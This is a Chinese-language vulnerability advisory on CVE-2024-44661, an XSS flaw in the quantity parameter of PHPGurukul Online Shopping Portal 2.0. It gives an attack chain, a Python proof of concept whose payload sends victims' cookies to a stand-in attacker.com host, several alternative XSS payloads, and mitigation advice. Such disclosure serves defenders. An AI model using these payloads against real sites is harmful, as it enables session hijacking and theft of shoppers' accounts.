CVE-2024-44661: PHPGurukul Online Shopping Portal 2.0 quantity参数XSS漏洞

漏洞信息

漏洞编号

CVE-2024-44661

漏洞类型

XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

PHPGurukul Online Shopping Portal 2.0

漏洞概述

CVE-2024-44661是PHPGurukul Online Shopping Portal 2.0中发现的一个跨站脚本（XSS）安全漏洞。该漏洞存在于my-cart.php文件中的quantity参数，由于缺乏对用户输入的充分过滤和转义，攻击者可以通过构造恶意的JavaScript脚本注入到页面中。当其他用户访问包含恶意代码的页面时，攻击脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。作为一个在线购物平台，该系统处理大量用户交易数据，XSS漏洞的存在可能危及用户的账户凭证、支付信息和个人隐私。由于攻击需要用户交互（UI:R），攻击者通常需要诱骗受害者访问恶意链接或页面。虽然CVSS评分为5.4（中危），但在实际场景中，该漏洞可能被用于进一步的攻击链，对用户和企业造成更严重的影响。

技术细节

该漏洞属于存储型或反射型XSS，具体取决于quantity参数的处理方式。在my-cart.php文件中，quantity参数用于指定购物车中商品的数量。系统在接受用户输入后，未对特殊字符进行HTML实体编码就直接输出到页面中。攻击者可以构造如下Payload：<script>alert(document.cookie)</script>或<img src=x onerror=alert(1)>等恶意代码。当管理员或用户查看购物车页面时，恶意脚本会被浏览器解析执行。由于quantity参数在购物车功能中是常用字段，攻击者可以在添加商品到购物车的过程中注入恶意代码。如果系统存在订单确认、购物车历史记录等功能，恶意代码可能被长期存储，形成存储型XSS。攻击者利用此漏洞可以窃取用户的会话Cookie、劫持用户账户、修改页面内容进行钓鱼，或在用户不知情的情况下执行未经授权的操作。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者识别目标网站使用的PHPGurukul Online Shopping Portal 2.0版本，并定位my-cart.php文件及其quantity参数

STEP 2

步骤2: 构造恶意Payload

攻击者构造XSS恶意代码，如<script>alert(document.cookie)</script>，用于窃取用户会话信息或执行恶意操作

STEP 3

步骤3: 注入恶意代码

攻击者通过quantity参数将XSS Payload注入到购物车功能中，可能通过GET或POST请求方式提交

STEP 4

步骤4: 诱骗受害者访问

由于需要用户交互，攻击者通过钓鱼邮件、社交工程等方式诱骗目标用户访问包含恶意代码的页面

STEP 5

步骤5: 执行恶意脚本

当受害者浏览器加载页面时，恶意JavaScript代码被执行，窃取Cookie、会话令牌或其他敏感信息

STEP 6

步骤6: 账户劫持或数据窃取

攻击者利用窃取的凭证劫持用户账户，访问支付信息、修改订单或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2024-44661 PoC - XSS in quantity parameter
# Target: PHPGurukul Online Shopping Portal 2.0 my-cart.php

target_url = "http://target-site.com/my-cart.php"

# XSS payload - steals session cookie
xss_payload = "<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"

# Encode the payload for URL
encoded_payload = urllib.parse.quote(xss_payload)

# Method 1: Add to cart with XSS in quantity parameter
params = {
    'id': '1',
    'quantity': xss_payload,  # Inject XSS payload
    'add_to_cart': '1'
}

print("[*] Sending XSS payload to quantity parameter...")
response = requests.get(target_url, params=params)

if xss_payload in response.text:
    print("[+] XSS payload reflected in response - Vulnerability confirmed!")
    print("[*] Payload URL-encoded:", encoded_payload)
else:
    print("[-] Payload not found in response")

# Alternative payloads for testing:
# <img src=x onerror=alert(document.domain)>
# <svg onload=alert(1)>
# ';" onfocus=alert(1) autofocus>

影响范围

PHPGurukul Online Shopping Portal 2.0

防御指南

临时缓解措施

在my-cart.php中对quantity参数使用htmlspecialchars()或htmlentities()函数进行输出编码，对所有特殊字符进行HTML实体转义。同时在HTTP响应头中添加X-XSS-Protection和Content-Security-Policy头部以增强防护。对于购物车功能实施输入验证，限制quantity参数只能接受数字值。建议临时禁用相关功能或部署WAF规则阻止包含<script>标签的请求，直到官方补丁发布。